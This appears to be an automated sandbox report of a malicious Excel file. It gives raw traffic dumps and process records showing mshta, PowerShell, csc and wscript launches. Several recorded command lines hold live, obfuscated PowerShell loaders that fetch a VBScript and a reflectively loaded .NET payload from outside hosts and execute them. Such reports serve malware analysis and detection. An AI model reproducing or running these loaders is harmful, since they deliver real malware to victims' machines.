                                                                                                            2024-11-20 15:58:11 UTC8192INData Raw: 51 a8 69 18 47 b0 47 18 3e 95 0b 46 bb 60 6e 1d 44 5a 3d 51 4d 2f 94 d7 e6 06 65 04 72 ab 60 5f ce b9 c4 34 a1 27 66 69 91 14 ac 1b 94 b1 62 03 19 05 13 56 48 e7 a6 67 3e a2 57 91 5d e4 91 99 6b 69 66 24 8f ae 74 73 32 4b bc 3b 06 bb 04 31 1d 7a e0 6a 79 71 c4 24 91 63 32 6d 74 50 05 f7 52 49 53 d7 a8 e2 f1 6d 4e d9 bc 5b 54 18 7a 43 4a 55 7a 55 06 23 f5 03 14 12 3b 39 70 79 1d 7d 44 5e 41 95 84 ef 27 05 9b 75 df c6 c1 fe 78 0d cf 1c 42 30 c9 44 ec 52 40 dc 48 24 0b b3 54 07 27 a7 7c 16 a3 4d b0 ea 29 08 0b 38 44 bf 6f 57 f6 18 03 33 b4 7b 0b 31 51 d1 6c d0 ce 32 c8 48 63 23 13 ef 7f eb dc e0 3b 2a 98 57 52 62 97 cb 53 33 26 d0 5a d8 0e 9d 38 ef 99 db af e5 85 de 40 3b 59 80 6e b7 dc fe 7f 2c 08 04 f3 81 78 ab cc 00 93 5d f8 bc 7b ee a1 23 4d c8 a7 cd 57
                                                                                                            Data Ascii: QiGG>F`nDZ=QM/er`_4'fibVHg>W]kif$ts2K;1zjyq$c2mtPRISmN[TzCJUzU#;9py}D^A'uxB0DR@H$T'|M)8DoW3{1Ql2Hc#;*WRbS3&Z8@;Yn,x]{#MW
                                                                                                            2024-11-20 15:58:11 UTC8192INData Raw: 30 fc 80 fe 99 e8 75 de 2a fa f6 12 4a c9 14 60 92 14 74 f7 e7 f2 ff 00 db bf 94 d5 96 6d 43 3d 0a 26 f8 ed 80 cb e9 e3 da 36 ea 62 6b 1c 29 0c 09 f8 1e 2a fe b8 fe b5 64 4d 66 a4 3d b9 99 42 c4 55 41 0d eb 52 54 7e 59 8d fb d7 65 2a ac 41 14 a7 de b3 4a 7d 44 9a 5d 4e a5 f6 ab 89 24 6e 0f e1 5e 5b 6b 0f f3 70 79 ec 3f 40 6b 51 19 2a cf 31 8b 4e 1d f7 b0 90 b2 bf 7e 59 49 e7 ad 7a 54 f3 7d 3a e0 e4 1a 43 a7 88 be a7 7b 46 bb 76 42 84 5a db 37 e2 60 2b af b6 25 a8 81 a0 41 22 33 34 7c ee 2d 5b 95 b7 30 a3 c9 f6 eb 80 99 9e 16 65 65 da 77 15 f9 d1 c0 d5 3a cd 34 50 48 d0 45 12 96 55 55 0e 0b b7 04 1f 56 ef 49 e9 db f2 c0 ea f5 8f a8 88 ac 93 c9 21 de 0a 86 63 41 76 f5 2a 78 04 7c 3e 3f 0c 45 57 cc 49 5c b5 84 53 c1 f7 24 0a cb c7 1f 9a 41 f3 02 0f 50 b6 da
                                                                                                            Data Ascii: 0u*J`tmC=&6bk)*dMf=BUART~Ye*AJ}D]N$n^[kpy?@kQ*1N~YIzT}:C{FvBZ7`+%A"34|-[0eew:4PHEUUVI!cAv*x|>?EWI\S$AP
                                                                                                            2024-11-20 15:58:11 UTC8192INData Raw: ec ca 87 b7 43 ef 87 04 c2 02 1e 4f 73 ed f0 c0 50 c4 c4 6c 55 e1 7a 9f 73 9c 23 2a 79 18 e0 52 a0 90 6f 76 41 5f e1 23 00 02 32 c6 f6 f5 c2 08 8d 7e 1a c6 23 52 0d 01 c6 1e 18 0b 03 c6 02 8b 16 68 69 23 70 82 a1 dc 3b 5b d6 42 c2 6a ab be 69 e8 f4 ee 12 33 6b c3 1e 3e 98 0a ca ba 9e 07 92 23 1e c3 9c 96 fb cc 9e 96 4d cb 5c 2f 19 ab 2c 47 82 c4 75 e9 83 2a 77 82 07 5f 7c 0c c4 81 94 9d ba 7e 7e 79 29 a7 95 5c fe ec 90 7f 87 36 97 4c d4 18 aa f3 ed 85 5d 33 10 dd 86 07 9e 3a 37 07 94 a1 90 b0 15 71 69 7c f4 cf 42 b0 16 ea 56 c1 a3 c6 13 c9 aa 04 29 fa 60 79 d6 d2 b8 24 95 ab 39 5f bb b8 37 b7 3d 31 d3 fa 4a f0 4e 42 69 13 93 27 2a be a3 f4 e7 03 09 e1 78 b4 2c 86 c1 91 94 9f 88 ab af fc a7 fe 2c 4c 42 6c 71 9e a6 58 03 40 8c 54 29 60 58 df b9 3f da b3 3d
                                                                                                            Data Ascii: COsPlUzs#*yRovA_#2~#Rhi#p;[Bji3k>#M\/,Gu*w_|~~y)\6L]3:7qi|BV)`y$9_7=1JNBi'*x,,LBlqX@T)`X?=


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:10:56:53
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                            Imagebase:0x13fe40000
                                                                                                            File size:28'253'536 bytes
                                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:10:57:19
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                            Imagebase:0x13fbb0000
                                                                                                            File size:13'824 bytes
                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:10:57:28
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:10:57:30
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:10:57:33
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                                                                                                            Imagebase:0x13fee0000
                                                                                                            File size:2'758'280 bytes
                                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:10:57:33
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
                                                                                                            Imagebase:0x13f830000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:10:57:40
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                            Imagebase:0xff870000
                                                                                                            File size:168'960 bytes
                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:14
                                                                                                            Start time:10:57:40
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                                            Imagebase:0x190000
                                                                                                            File size:2'525'680 bytes
                                                                                                            MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:15
                                                                                                            Start time:10:57:41
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:17
                                                                                                            Start time:10:57:42
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:18
                                                                                                            Start time:10:57:49
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                            Imagebase:0x13f4b0000
                                                                                                            File size:13'824 bytes
                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:20
                                                                                                            Start time:10:57:56
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:22
                                                                                                            Start time:10:57:56
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:10:57:58
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                                                                                                            Imagebase:0x13fd30000
                                                                                                            File size:2'758'280 bytes
                                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:24
                                                                                                            Start time:10:58:00
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                                                                                                            Imagebase:0x13f6a0000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:26
                                                                                                            Start time:10:58:04
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                            Imagebase:0xffc70000
                                                                                                            File size:168'960 bytes
                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:27
                                                                                                            Start time:10:58:04
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
